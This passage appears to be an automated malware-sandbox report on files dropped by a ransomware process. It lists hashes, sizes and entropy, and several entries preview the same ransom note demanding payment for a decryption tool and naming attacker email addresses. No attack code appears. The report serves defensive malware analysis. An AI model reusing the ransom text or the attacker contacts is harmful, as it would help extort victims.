                                                                                                    SSDEEP:6:BOtly1UwtAQOTBGaNKJknOQfdJ/kOD85cFPGcpy3scDlYvo3I60D5JkzHpOHn:BOt/wtAQ8BGnJ6OQffcM8CUGy39DCAJw
                                                                                                    MD5:242F7A3F7DE71A8D8BE6C099DECA9F04
                                                                                                    SHA1:D7D77FEF0D91E9DE32F0F84AF4BC269BE214F02D
                                                                                                    SHA-256:0CB2E2B8EF3AA4BA650DA813B6B6B6BFF5751CC153181CE4569CB94FD414DE7D
                                                                                                    SHA-512:8C814FAFDA3856ADB3AC957CF3A5221C2E3CDE10002E1B5C26F97ED5E2C73117BB95DEDCD7B88C5CABCD8D6F5F0FB626E34EBA28E17BABD408DF601CA905C50F
                                                                                                    Malicious:true
                                                                                                    Preview:<v.e.d.o]A...vH/..........4W.Bf.. ........HoD.H...A.........aa../.[.R...1....{.b..:.4"..C0.]..'.../...LD...:.]5.KHgP...v.t...e.Q%.N.=.N]>L....'... ..r......W!.......Ow..t..{uT..Z..`..DL..I9A\x.....!.Ij.y.|=.A..]..lR0.....R]--../......o.....C..S...p.....H..s<a.t@.N..0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):49418
                                                                                                    Entropy (8bit):1.1809912695354934
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:z+I3GUALXuhAdOOMxtZcHwKrB+JZzl18p1kEIghDch:xiL+hKOOMxMHwVJZz/8p1kpghDch
                                                                                                    MD5:F5EAC1EB7778E62BBE6714027A6163B4
                                                                                                    SHA1:5813D6219B687054F510577E2E3FE7DA1583A861
                                                                                                    SHA-256:B2329D5AE8F43678E6D74B79AA4638D73D1B9007C75CE27D2FE9A26B86308C15
                                                                                                    SHA-512:4F7FBC2DCBDBB45731ECADEE69CCF2F40C3150600435A33B98641FA43C107FDBF3DD15D343CF66B54674C252A0D9A2E48C9464EBD2557A05AADC4E41769F01B3
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):49418
                                                                                                    Entropy (8bit):1.155407688201581
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:JzTWjmFvuRWAz9g11adz/2Nsejk+x7X9TF9BAaQ9JUpeflkG:x2mPsL8jXZFABJUpeflV
                                                                                                    MD5:EBDA7267825551F233DF554915242B4E
                                                                                                    SHA1:130930FE2119BEBA6D393E776C7A1F9837AF8306
                                                                                                    SHA-256:D8F07283195D2A059D2010D57102A1D74B90D98CCB912A68E4ECA53BF65D80C8
                                                                                                    SHA-512:7C22A40CB87F7836BE5FAE90EFD8B6BA1F761D4E5BFB1FB0279855143FBFAB407D262C6CE7347CA2C74BF6B2A73BDA71855CD62831B077BEBC4FA80123447FDC
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33034
                                                                                                    Entropy (8bit):1.6116023924198521
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Q/rDO/zpZ7NyTrzJSxo0KhWMx2Y4W+oiSiVZTKrDHoUJ0H:yetRNyJ0oTxvzpYZEbJ0H
                                                                                                    MD5:DB68168E1DF0D3B5C9155E807229EAFA
                                                                                                    SHA1:6EB20B7BD1DDED76E69ED1FA9C1947DB549A44F5
                                                                                                    SHA-256:388C23232F5D74766B65352F6F42F73B8778964A7DE11073A5E9CE3911358308
                                                                                                    SHA-512:CE88A7E7D89F004B861F1580889D5FEA095F61B55765E55DAF77B68CBB3A19008C9036F1FD74410219D60AF81E6DAD1176A9905DA99210A97563454AC07098D5
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33034
                                                                                                    Entropy (8bit):1.6116023924198521
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Q/rDO/zpZ7NyTrzJSxo0KhWMx2Y4W+oiSiVZTKrDHoUJ0H:yetRNyJ0oTxvzpYZEbJ0H
                                                                                                    MD5:DB68168E1DF0D3B5C9155E807229EAFA
                                                                                                    SHA1:6EB20B7BD1DDED76E69ED1FA9C1947DB549A44F5
                                                                                                    SHA-256:388C23232F5D74766B65352F6F42F73B8778964A7DE11073A5E9CE3911358308
                                                                                                    SHA-512:CE88A7E7D89F004B861F1580889D5FEA095F61B55765E55DAF77B68CBB3A19008C9036F1FD74410219D60AF81E6DAD1176A9905DA99210A97563454AC07098D5
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.1557206072318555
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ZF3pwB3rYLi4/O1tBUoGANmew0JibXhqWMoO6Vgm81hJACdMRn:ZF319oBuANTAcJFG8Zndyn
                                                                                                    MD5:20DBB43DA988CC9ECCBBA21B2E249AB7
                                                                                                    SHA1:669C13A473EFCB2DA0C44DECDB55DA1BB895321E
                                                                                                    SHA-256:DBFAB4026CEB8C38673B73D7D8AA4A0CDED340431DA21AB8F0F6D6FA54CA5C0E
                                                                                                    SHA-512:F35D175B75DE83F08DD5CAF7E1735DB4C36712B68F59FB68534B391B4EB54743061454BA70F26C952CCD8AECF2DC3A5D021B1697C1E699C743A13554950FFABC
                                                                                                    Malicious:true
                                                                                                    Preview:].L`..p..)J...j............$.pr.J^..IA.L.....1...HBQ....n..v]o..E.3?..~...g.B.\...8.h|....j....W.%..5.o...J...f.r....P..dN.l./..z..*C]..:.*Qhe...#...m*..s.%xW..`CjS.....|.S..Z...am...H.s.u......=jm....mEM.....&V..T.2`.q..._h.....2..9o....\E.g,.?.K..)..b.Aa.....>.0+h0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):49418
                                                                                                    Entropy (8bit):1.155407688201581
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:JzTWjmFvuRWAz9g11adz/2Nsejk+x7X9TF9BAaQ9JUpeflkG:x2mPsL8jXZFABJUpeflV
                                                                                                    MD5:EBDA7267825551F233DF554915242B4E
                                                                                                    SHA1:130930FE2119BEBA6D393E776C7A1F9837AF8306
                                                                                                    SHA-256:D8F07283195D2A059D2010D57102A1D74B90D98CCB912A68E4ECA53BF65D80C8
                                                                                                    SHA-512:7C22A40CB87F7836BE5FAE90EFD8B6BA1F761D4E5BFB1FB0279855143FBFAB407D262C6CE7347CA2C74BF6B2A73BDA71855CD62831B077BEBC4FA80123447FDC
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):532746
                                                                                                    Entropy (8bit):4.256925069361227
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:V6O5ocEznn+Si6iEwyW2hk/PQJYTNkDfSe8f7b:0O+cEJi6iEwyN8jTNkDKeYb
                                                                                                    MD5:CDF9EE59223E82B3DB8F6538C6C5E6A9
                                                                                                    SHA1:84E22B0493B0604163020C6B179D5EB2012436F0
                                                                                                    SHA-256:8115A7A670FAC312D56495E5ED13A4780344995FFF179ABDD75C0BEF35022D41
                                                                                                    SHA-512:280189673962090529F4252427F412F87C5FD333C924E72CDB474AAD32D4B750673F55B26084977529D5D0156F482760C52C96DB2333CCA25E1F8F209B4D8C1C
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33034
                                                                                                    Entropy (8bit):1.6520353263508165
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:kmC+H4ADIOsp1oABjpdodqDIO8RwVci/LKnsyTPcT6jt1QlgZXZ5:km5M7oAtIdIIQVV/LKs2PB1Qu5j
                                                                                                    MD5:B6B83D6423158AC84062816EC310525A
                                                                                                    SHA1:62F89B81A59165E2D35A159EC9FB5025F5E42ED9
                                                                                                    SHA-256:B388108BD530E5CF49EAC9FD9B6CD699DA4D8517B8CC740CAF355B184A1ADB38
                                                                                                    SHA-512:EB57845AC0D56ACFFE731F31A071D631A6CD92412B7061E540B83F3BE7D730B5737F67DAB14F3EB2F3078C40F57818865CC5B1275D932F4A8FC8962CC2BABA78
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33034
                                                                                                    Entropy (8bit):1.6520353263508165
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:kmC+H4ADIOsp1oABjpdodqDIO8RwVci/LKnsyTPcT6jt1QlgZXZ5:km5M7oAtIdIIQVV/LKs2PB1Qu5j
                                                                                                    MD5:B6B83D6423158AC84062816EC310525A
                                                                                                    SHA1:62F89B81A59165E2D35A159EC9FB5025F5E42ED9
                                                                                                    SHA-256:B388108BD530E5CF49EAC9FD9B6CD699DA4D8517B8CC740CAF355B184A1ADB38
                                                                                                    SHA-512:EB57845AC0D56ACFFE731F31A071D631A6CD92412B7061E540B83F3BE7D730B5737F67DAB14F3EB2F3078C40F57818865CC5B1275D932F4A8FC8962CC2BABA78
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.229404257471757
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:P8HwzN9qMj/a8qtDmZrk8loHFitSEAf0lmTfYf6BOi2bYn:P88LqMj/a8sDsrkNk2kAOun
                                                                                                    MD5:75378ECFB84FD1675E84CA71E3B70EA0
                                                                                                    SHA1:C03125F02F7CC723DD8EE2C2DA9DD280037F90AD
                                                                                                    SHA-256:5AF59F2622877C0CDE992078A5169A4803A351526926A509FB5EE17636F84334
                                                                                                    SHA-512:30DCF4839C7960347C5D908F58EA887357077515CB015424A1DD3F7A3DAFC6244AE4B6E8B359DCCBEFF60D252048B7DA2754853AE6F854CFA4EE39804D2AEEEE
                                                                                                    Malicious:true
                                                                                                    Preview:.-..b'.......t.................K..5I.S*.IZ...W.).h..p.*N.C.)..C...5*...<..,......0\.U.i....#....JC..u..$...........*...}....;..OJ}..@.cP.s..ni..d.Ze.....j..{..Z\.U....hu..D.8D..o.H.........g.L.......A..?.. ......#t.[9.Qd.Y."O....G.........f.>F.......B.[..U.V.r%9Ur...c.....0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):532746
                                                                                                    Entropy (8bit):4.256925069361227
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:V6O5ocEznn+Si6iEwyW2hk/PQJYTNkDfSe8f7b:0O+cEJi6iEwyN8jTNkDKeYb
                                                                                                    MD5:CDF9EE59223E82B3DB8F6538C6C5E6A9
                                                                                                    SHA1:84E22B0493B0604163020C6B179D5EB2012436F0
                                                                                                    SHA-256:8115A7A670FAC312D56495E5ED13A4780344995FFF179ABDD75C0BEF35022D41
                                                                                                    SHA-512:280189673962090529F4252427F412F87C5FD333C924E72CDB474AAD32D4B750673F55B26084977529D5D0156F482760C52C96DB2333CCA25E1F8F209B4D8C1C
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:OpenPGP Secret Key
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4694
                                                                                                    Entropy (8bit):7.927713577381661
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:AWQHcicEWc5VmSWV4NijDbF2nbdrgbS0E2wlMJJCfhi2x+Hwun24h6oa:AWQrHrM4cYRkqbgHP1Ta
                                                                                                    MD5:D066290B5D5DC959728BB5D167AEB9DB
                                                                                                    SHA1:92D5643A7353A32182268402B445CDA4D6ED5901
                                                                                                    SHA-256:0E420CB311F67EC21694A7B20DC547D4EAC56103E33C32D7FD883627218D501C
                                                                                                    SHA-512:C2F0529174BB3EA97B78097FB9C8E7A4665AA8FBBAB4E9A0084BEBC8C0EC78E2CF1E68F4D102E06D72172867C13376E44CFA6710C6188B1267AAA485FB7F2C1B
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:OpenPGP Secret Key
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4694
                                                                                                    Entropy (8bit):7.927713577381661
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:AWQHcicEWc5VmSWV4NijDbF2nbdrgbS0E2wlMJJCfhi2x+Hwun24h6oa:AWQrHrM4cYRkqbgHP1Ta
                                                                                                    MD5:D066290B5D5DC959728BB5D167AEB9DB
                                                                                                    SHA1:92D5643A7353A32182268402B445CDA4D6ED5901
                                                                                                    SHA-256:0E420CB311F67EC21694A7B20DC547D4EAC56103E33C32D7FD883627218D501C
                                                                                                    SHA-512:C2F0529174BB3EA97B78097FB9C8E7A4665AA8FBBAB4E9A0084BEBC8C0EC78E2CF1E68F4D102E06D72172867C13376E44CFA6710C6188B1267AAA485FB7F2C1B
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):316
                                                                                                    Entropy (8bit):7.2785726105698805
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:XJn+h1vvf6dULmnhi+66dqnre7cPD312lphGQT6CieDdg2OWJTsDNs4EbP/NWSBJ:XUT6iUhi+xqnuc7l2lTG+rO6lpfn
                                                                                                    MD5:3580C2A63B2EF92B6AA1199261425A8D
                                                                                                    SHA1:F7006FF2C6C42CE0BF02F7964B095837C535FD29
                                                                                                    SHA-256:D93E037F5CF1F4E13E7906E3FAD2946576CF6806B2035678483C157FC25CEDD3
                                                                                                    SHA-512:1B145693A14387BE12C185B8050E397D753238683D916C516B94A927BC0491FDB20FB3C9EE1875CBA60BAF22C7898E5C7BB56B8B73FD5FE9510D27DA74B32D34
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):316
                                                                                                    Entropy (8bit):7.2785726105698805
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:XJn+h1vvf6dULmnhi+66dqnre7cPD312lphGQT6CieDdg2OWJTsDNs4EbP/NWSBJ:XUT6iUhi+xqnuc7l2lTG+rO6lpfn
                                                                                                    MD5:3580C2A63B2EF92B6AA1199261425A8D
                                                                                                    SHA1:F7006FF2C6C42CE0BF02F7964B095837C535FD29
                                                                                                    SHA-256:D93E037F5CF1F4E13E7906E3FAD2946576CF6806B2035678483C157FC25CEDD3
                                                                                                    SHA-512:1B145693A14387BE12C185B8050E397D753238683D916C516B94A927BC0491FDB20FB3C9EE1875CBA60BAF22C7898E5C7BB56B8B73FD5FE9510D27DA74B32D34
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):98570
                                                                                                    Entropy (8bit):0.6455065458067311
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:69r3EfyCYznrrQwwKe5q6I50z1iez1SQuJm8nKU0V8snrDRhH:69okrQNPq4piezoQuJVnVohH
                                                                                                    MD5:210AF4AEC998C500143734D0E278E22F
                                                                                                    SHA1:1BB85BF2E02E8FC2A90D75B814C77ACB66D6D966
                                                                                                    SHA-256:5A54600A269CE26BEDC2A4A46662E02D78C3AE7D4D4341EFF7685737C699632F
                                                                                                    SHA-512:964B0DFF6A87BEA6D0E7C4BBD65076EBC6E46F023A81481285877F2661C0E430202A9EBE9538452601E2CB8DA26731AD65AAAB2FC2C9DCB1F7E9F66984D9964C
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33034
                                                                                                    Entropy (8bit):1.6080675099197024
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Ah1IyH3qE9Ng0vFXoBBwlpqKJ6QuQQ6BFJ5u9zmmv4ROpPDuz+DT:u1cEdWPwlpqKJ6/SBFnu9zThDuzgT
                                                                                                    MD5:0C07F1DB13899CBBCF617D846B89DD69
                                                                                                    SHA1:F17510449CFAAC1E89E2DDAAF83C43E675D5E2F3
                                                                                                    SHA-256:CC151748F00F8D8DDB6C408067B1AB5B721009197168F11069DC357362A504AD
                                                                                                    SHA-512:5BE9D3C7131BECFE0807361604CEE5EF798C233BE253FB0DB84C7892F38AF25B11652420C49E454DCD9C90E201B322F88DABC11B971F6A38714FAED2EAB99BE0
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33034
                                                                                                    Entropy (8bit):1.6080675099197024
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Ah1IyH3qE9Ng0vFXoBBwlpqKJ6QuQQ6BFJ5u9zmmv4ROpPDuz+DT:u1cEdWPwlpqKJ6/SBFnu9zThDuzgT
                                                                                                    MD5:0C07F1DB13899CBBCF617D846B89DD69
                                                                                                    SHA1:F17510449CFAAC1E89E2DDAAF83C43E675D5E2F3
                                                                                                    SHA-256:CC151748F00F8D8DDB6C408067B1AB5B721009197168F11069DC357362A504AD
                                                                                                    SHA-512:5BE9D3C7131BECFE0807361604CEE5EF798C233BE253FB0DB84C7892F38AF25B11652420C49E454DCD9C90E201B322F88DABC11B971F6A38714FAED2EAB99BE0
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.23509365326752
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:OFNmORjiB4KIxYgsKS5HUQzv4g4L5oMeUMAYlhgwjLjji0BGoJptn:yjyXIxYgDS7OveUYqsXjiIrJptn
                                                                                                    MD5:3B6A289C97A353376880F8C41670F372
                                                                                                    SHA1:8F9D634BB06C13B956967A9F5F7657FDA59DD77D
                                                                                                    SHA-256:A251C2CF5B1E7921A2D5852351A8A4F84B219BEF1C0346CF50BD7A2DF9E50A52
                                                                                                    SHA-512:F1954A22EB766015A2FF83A85BBB55EE01C0ACE48CC91958F65695EE3463304D0E77BC54A665E1A0CD804E8C327EA0F3598BFA1A3E8D8FA110E9BCF55E716961
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):98570
                                                                                                    Entropy (8bit):0.6455065458067311
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:69r3EfyCYznrrQwwKe5q6I50z1iez1SQuJm8nKU0V8snrDRhH:69okrQNPq4piezoQuJVnVohH
                                                                                                    MD5:210AF4AEC998C500143734D0E278E22F
                                                                                                    SHA1:1BB85BF2E02E8FC2A90D75B814C77ACB66D6D966
                                                                                                    SHA-256:5A54600A269CE26BEDC2A4A46662E02D78C3AE7D4D4341EFF7685737C699632F
                                                                                                    SHA-512:964B0DFF6A87BEA6D0E7C4BBD65076EBC6E46F023A81481285877F2661C0E430202A9EBE9538452601E2CB8DA26731AD65AAAB2FC2C9DCB1F7E9F66984D9964C
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.193433389444299
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:YbecFGRriNY1wEJOTiUbKTbc5QE/TH6+9q6nYSn:YbeXieyTiUbKYQMH6L6YSn
                                                                                                    MD5:76A1E268B37CA68DBDB3CDC14D47CA7B
                                                                                                    SHA1:739B9F04B9819506FFDD196E385B675A10BF9550
                                                                                                    SHA-256:FB643B8AB508E229BF38316B4A8ABA3CC1AAE9B5622FF9538F35980D5710515F
                                                                                                    SHA-512:1D2127CDA74E9C193A5D0842F5FBB43BF1D062E60A8CAAB08F1B0FB861B5472E318BEE72A57E423789363F1E7DA983EEB9444C34195C4ABE26BEA78F9EBE6C8A
                                                                                                    Malicious:true
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
